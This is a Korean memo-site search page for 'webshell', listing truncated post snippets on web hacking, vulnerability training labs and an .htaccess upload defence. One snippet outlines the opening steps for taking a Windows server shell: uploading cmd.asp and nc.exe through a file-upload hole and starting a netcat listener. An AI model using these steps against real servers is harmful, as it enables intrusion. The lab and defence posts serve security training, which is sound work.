메모智 유머사진 환영합니다, 손님!    메모지 | 회원가입 | 로그인
검색도움말 메모지 검색
  재미메모智.COM 설치   •   메모智 홈   •   바깥고리   •   전체 메모智 목록   •   회원가입   •   로그인   •   도움말   •  
  메모智 검색 - 웹쉘
검색 관련 꼬리표 구름 #웹쉘 #webshell #웹해킹 #정보보안 #취약점점검 #파일업로드 #훈련장 #JSP #docs.war #관리자 #권한인증 #웹 쉘 #침해사고 #해킹 #ASP 웹쉘 #JIPS #JSPX 웹쉘 #JSP웹쉘 #Web Shell #WebSHArk #curl #fckeditor #jsp file browser #jsp web shell #jsp 웹쉘 #kisa #whistl #계정생성 #구글해킹 #논문 #비밀번호 #웹쉘탐지 #윤리적 해킹 #자동화공격 #취약점 점검 #파일업로드 취약점 #휘슬
윈도우 서버 쉘 따기: reverse telnet
1. 파일업로드 기능이 있는 웹쉘 업로드 (예를 들어 cmd.asp) 2. nc.exe 업로드 3. cmd.asp를 통해 nc.exe 경로확인 (dir /w /s \nc.exe) - C:\InetPub\wwwroot\board\pds\nc.exe 4. 공격자: nc.exe -l ...
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
비공개 글
비공개 메모智
작성자 본인만이 볼 수 있습니다.
wh-account-01-1.pngwh-account-01-2.png
[WH-account-01] 웹 취약점 훈련장 - 계정생성 헛점을 이용한 관리자 권한 상승
wh-account-01.tgz를 다운로드 $ cd public_html/ $ tar xzvf ~/Downloads/wh-account-01.tgz $ cd wh-account-01/ $ chmod 777 files/ userInfo/ 웹 브라우저로 http://127....
| 공개 | 댓글: 0 | 첨부파일: 3 | 등록자: jinsuk | 등록일: |  
wh-account-02.png
[WH-account-02] 웹 취약점 훈련장 - 회원정보 갱신 헛점을 이용한 관리자 권한 획득
wh-account-02.tgz를 다운로드 $ cd public_html/ $ tar xzvf ~/Downloads/wh-account-02.tgz $ cd wh-account-02/ $ chmod 777 files/ userInfo/ $ sudo chown www-data...
| 공개 | 댓글: 0 | 첨부파일: 2 | 등록자: jinsuk | 등록일: |  
파일업로드 취약점 방지 방법 1: 응급 대책 - .htaccess로 스크립트 실행제한
이미 파일업로드 취약점이 있어서 웹쉘이 실행되는 경우에는 업로드 디렉토리에서의 악성스크립트 실행을 방지한다. 1) .htaccess 파일 업로드가 불가능하도록 서버측의 파일 업로드 스크립트를 급히 수정한다. 2) 업로드 디렉토리에 다음과 같은 내용을 가진 .htaccess 파...
| 공개 | 댓글: 0 | 첨부파일: 0 | 등록자: jinsuk | 등록일: |  
현재 검색결과내 꼬리표 모음 # #.htaccess #JIPS #WebSHArk #계정생성 #관리자 #권한인증 #논문 #보안 #비밀번호 #업로드취약점 #웹쉘 #웹해킹 #윈도우 #정보보안 #취약점점검 #파일업로드 #해킹 #훈련장
메모智 열람: [1<이전]  2 / 2 (총 15 건)    [처음]  

 

drupal hit counter

Site Stat
검색
Custom Search
모든 지식은 개인의 소유입니다.
그 외의 다른 내용은 Copyright © since 2010, 메모智.com이 가집니다.
메모지사용시 주의사항연락처powered by 크리스탈